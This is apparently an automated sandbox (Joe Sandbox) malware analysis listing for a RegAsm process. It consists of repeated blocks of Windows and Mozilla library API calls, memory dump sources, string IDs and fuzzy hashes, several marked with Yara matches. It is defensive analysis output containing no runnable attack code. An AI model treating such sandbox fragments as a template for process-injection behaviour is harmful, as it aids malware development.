                                                                                                                                                                                                                                                    • MozFormatCodeAddress.MOZGLUE ref: 6C736EC1
                                                                                                                                                                                                                                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C736EE1
                                                                                                                                                                                                                                                    • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C736EED
                                                                                                                                                                                                                                                    • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6C736EFF
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4058739482-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C6D3DEF), ref: 6C710D71
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C6D3DEF), ref: 6C710D84
                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C6D3DEF), ref: 6C710DAF
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Virtual$Free$Alloc
                                                                                                                                                                                                                                                    • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                                                                                                    • API String ID: 1852963964-2186867486
Uniqueness

Uniqueness Score: -1.00%

APIs
• WaitForSingleObject.KERNEL32(000000FF), ref: 6C73586C
• CloseHandle.KERNEL32 ref: 6C735878
• free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C735898
• free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C7358C9
• free.MOZGLUE(00000000), ref: 6C7358D3
Memory Dump Source
• Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
• Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
Similarity
• API ID: free$CloseHandleObjectSingleWait
• String ID:
• API String ID: 1910681409-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6C7275C4,?), ref: 6C72762B
  • Part of subcall function 6C6ECA10: malloc.MOZGLUE(?), ref: 6C6ECA26
• InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6C7274D7,6C721385,?,?,?), ref: 6C727644
• GetCurrentThreadId.KERNEL32 ref: 6C72765A
• AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C7274D7,6C721385,?,?,?), ref: 6C727663
• ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C7274D7,6C721385,?,?,?), ref: 6C727677
Memory Dump Source
• Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
• Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
Similarity
• API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
• String ID:
• API String ID: 418114769-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• __getptd.LIBCMT ref: 0041B09D
  • Part of subcall function 0041B274: __getptd_noexit.LIBCMT ref: 0041B277
  • Part of subcall function 0041B274: __amsg_exit.LIBCMT ref: 0041B284
• __getptd.LIBCMT ref: 0041B0B4
• __amsg_exit.LIBCMT ref: 0041B0C2
• __lock.LIBCMT ref: 0041B0D2
• __updatetlocinfoEx_nolock.LIBCMT ref: 0041B0E6
Memory Dump Source
• Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
• String ID:
• API String ID: 938513278-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• __Init_thread_footer.LIBCMT ref: 6C731800
  • Part of subcall function 6C70CBE8: GetCurrentProcess.KERNEL32(?,6C6D31A7), ref: 6C70CBF1
  • Part of subcall function 6C70CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6D31A7), ref: 6C70CBFA
  • Part of subcall function 6C6D4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C713EBD,6C713EBD,00000000), ref: 6C6D42A9
Strings
Memory Dump Source
• Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
• Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
Similarity
• API ID: Process$CurrentInit_thread_footerTerminatestrlen
• String ID: Details$name${marker.name} - {marker.data.name}
• API String ID: 46770647-1733325692
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

APIs
• free.MOZGLUE(?,?,6C73B0A6,6C73B0A6,?,6C73AF67,?,00000010,?,6C73AF67,?,00000010,00000000,?,?,6C73AB1F), ref: 6C73B1F2
• ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,6C73B0A6,6C73B0A6,?,6C73AF67,?,00000010,?,6C73AF67,?,00000010,00000000,?), ref: 6C73B1FF
• free.MOZGLUE(?,?,?,map/set<T> too long,?,?,6C73B0A6,6C73B0A6,?,6C73AF67,?,00000010,?,6C73AF67,?,00000010), ref: 6C73B25F
Strings
Memory Dump Source
• Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
• Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
Similarity
• API ID: free$Xlength_error@std@@
• String ID: map/set<T> too long
Uniqueness Score: -1.00%

APIs
• __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C722E2D
Strings
Similarity
• API ID: __acrt_iob_func
• String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 6C70CBE8: GetCurrentProcess.KERNEL32(?,6C6D31A7), ref: 6C70CBF1
  • Part of subcall function 6C70CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6D31A7), ref: 6C70CBFA
• EnterCriticalSection.KERNEL32(6C75E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C70D1C5), ref: 6C6FD4F2
• LeaveCriticalSection.KERNEL32(6C75E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C70D1C5), ref: 6C6FD50B
  • Part of subcall function 6C6DCFE0: EnterCriticalSection.KERNEL32(6C75E784), ref: 6C6DCFF6
  • Part of subcall function 6C6DCFE0: LeaveCriticalSection.KERNEL32(6C75E784), ref: 6C6DD026
• InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C70D1C5), ref: 6C6FD52E
• EnterCriticalSection.KERNEL32(6C75E7DC), ref: 6C6FD690
• LeaveCriticalSection.KERNEL32(6C75E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C70D1C5), ref: 6C6FD751
Strings
Similarity
• API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
• String ID: MOZ_CRASH()
Uniqueness Score: -1.00%

APIs
Strings
Similarity
• API ID: __aulldiv
• String ID: -%llu$.$profiler-paused
Uniqueness Score: -1.00%

APIs
• ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C74985D
• ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C74987D
• MOZ_CrashPrintf.MOZGLUE(ElementAt(aIndex = %zu, aLength = %zu),?,?), ref: 6C7498DE
Strings
• ElementAt(aIndex = %zu, aLength = %zu), xrefs: 6C7498D9
Similarity
• API ID: Printf$Target@mozilla@@$?vprint@Crash
• String ID: ElementAt(aIndex = %zu, aLength = %zu)
                                                                                                                                                                                                                                                    • API String ID: 1778083764-3290996778
                                                                                                                                                                                                                                                    • Opcode ID: b41736cbecc2ec4c2d08c61fc468d8e268dd8d1cb2257f4daf00ece08a3c471d
                                                                                                                                                                                                                                                    • Instruction ID: 49f0844f1199727ff48b454972d75c31255e1262f01d9995d20e7ecdc7dc9618
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b41736cbecc2ec4c2d08c61fc468d8e268dd8d1cb2257f4daf00ece08a3c471d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA3105B1B002086BDB14AF59DD489EF77E9DF88318F50802DEA1A9BB40DB3169058BE1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6C724721
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D4410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6C713EBD,00000017,?,00000000,?,6C713EBD,?,?,6C6D42D2), ref: 6C6D4444
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __aulldiv__stdio_common_vsprintf
                                                                                                                                                                                                                                                    • String ID: -%llu$.$profiler-paused
                                                                                                                                                                                                                                                    • API String ID: 680628322-2661126502
                                                                                                                                                                                                                                                    • Opcode ID: 94ecd9ab75b506a5f69704e2f089d8bc72f66c320d0ed108888b9bfe80da9ed5
                                                                                                                                                                                                                                                    • Instruction ID: 1bab531581ee2e6470c0ceaa72ec80ed3c7bc83de36fb43d53dfd0b6cb7a90e8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94ecd9ab75b506a5f69704e2f089d8bc72f66c320d0ed108888b9bfe80da9ed5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 583146B1F042084BCB0CCF7DD98529EBBE6DB89324F55813EE8159BB81EB7498048B90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::exception::exception.LIBCMT ref: 0040F4EF
                                                                                                                                                                                                                                                      • Part of subcall function 00419196: std::exception::_Copy_str.LIBCMT ref: 004191B1
                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040F504
                                                                                                                                                                                                                                                      • Part of subcall function 00419249: RaiseException.KERNEL32(?,0040F509,-00000208,|nB,?,0040F509,0040FB00,0042BC34,-00000208), ref: 0041928B
                                                                                                                                                                                                                                                      • Part of subcall function 0040F380: std::exception::exception.LIBCMT ref: 0040F3AF
                                                                                                                                                                                                                                                      • Part of subcall function 0040F380: __CxxThrowException@8.LIBCMT ref: 0040F3C4
                                                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040F54B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisememcpystd::exception::_
                                                                                                                                                                                                                                                    • String ID: |nB
                                                                                                                                                                                                                                                    • API String ID: 2091982303-3238407859
                                                                                                                                                                                                                                                    • Opcode ID: 859db08ed6faef6703455f35d8a99574dd2d5ea96faba9e99d9cc381962d9069
                                                                                                                                                                                                                                                    • Instruction ID: ac98e3361a73ce5637a895dd36a831096c0ef8c0a65fa9f60b0ed2364c1c9d28
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 859db08ed6faef6703455f35d8a99574dd2d5ea96faba9e99d9cc381962d9069
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4431FB71D00215ABCB24DF68C88079EBBB4EB44360F54423FE826A7BC1D338A944CBE5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C713EBD,6C713EBD,00000000), ref: 6C6D42A9
                                                                                                                                                                                                                                                    • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,6C72B127), ref: 6C72B463
                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C72B4C9
                                                                                                                                                                                                                                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C72B4E4
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _getpidstrlenstrncmptolower
                                                                                                                                                                                                                                                    • String ID: pid:
                                                                                                                                                                                                                                                    • API String ID: 1720406129-3403741246
                                                                                                                                                                                                                                                    • Opcode ID: 729170f4b14b90ad0787cfd79fc9eec14a1feb6e106e93a0758d460ad97dd77c
                                                                                                                                                                                                                                                    • Instruction ID: 25d7161cde29028d428bf4087bdf3e06fd56e0e94dfe74642a327e493a3afbea
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 729170f4b14b90ad0787cfd79fc9eec14a1feb6e106e93a0758d460ad97dd77c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38310331A012089BDB00DFAAD980AEEB7B5FF49318F940529D8226BA41D735B945CBA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6C737A3F), ref: 6C6EBF11
                                                                                                                                                                                                                                                    • ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6C737A3F), ref: 6C6EBF5D
                                                                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6C737A3F), ref: 6C6EBF7E
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@?init@?$basic_ios@D@std@@@2@_V?$basic_streambuf@
                                                                                                                                                                                                                                                    • String ID: tl
                                                                                                                                                                                                                                                    • API String ID: 4279176481-2603243157
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(shell32,?,6C74D020), ref: 6C6DF122
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C6DF132
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                    • String ID: SHGetKnownFolderPath$shell32
                                                                                                                                                                                                                                                    • API String ID: 2574300362-1045111711
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71E577
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71E584
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71E5DE
                                                                                                                                                                                                                                                    • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C71E8A6
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
                                                                                                                                                                                                                                                    • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$[I %d/%d] profiler_start
                                                                                                                                                                                                                                                    • API String ID: 1483687287-1611356987
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C720CD5
                                                                                                                                                                                                                                                      • Part of subcall function 6C70F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE(?,6C6E5407), ref: 6C70F9A7
                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C720D40
                                                                                                                                                                                                                                                    • free.MOZGLUE ref: 6C720DCB
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C6F5EDB
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5E90: memset.VCRUNTIME140(ewsl,000000E5,?), ref: 6C6F5F27
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C6F5FB2
                                                                                                                                                                                                                                                    • free.MOZGLUE ref: 6C720DDD
                                                                                                                                                                                                                                                    • free.MOZGLUE ref: 6C720DF2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4069420150-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C729188
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008), ref: 6C7291BB
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,00000008,0000000F), ref: 6C7291EB
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008), ref: 6C729200
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C729219
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: malloc$freememcpy
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4259248891-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75E7DC), ref: 6C710838
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C71084C
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6C7108AF
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 6C7108BD
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75E7DC), ref: 6C7108D5
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
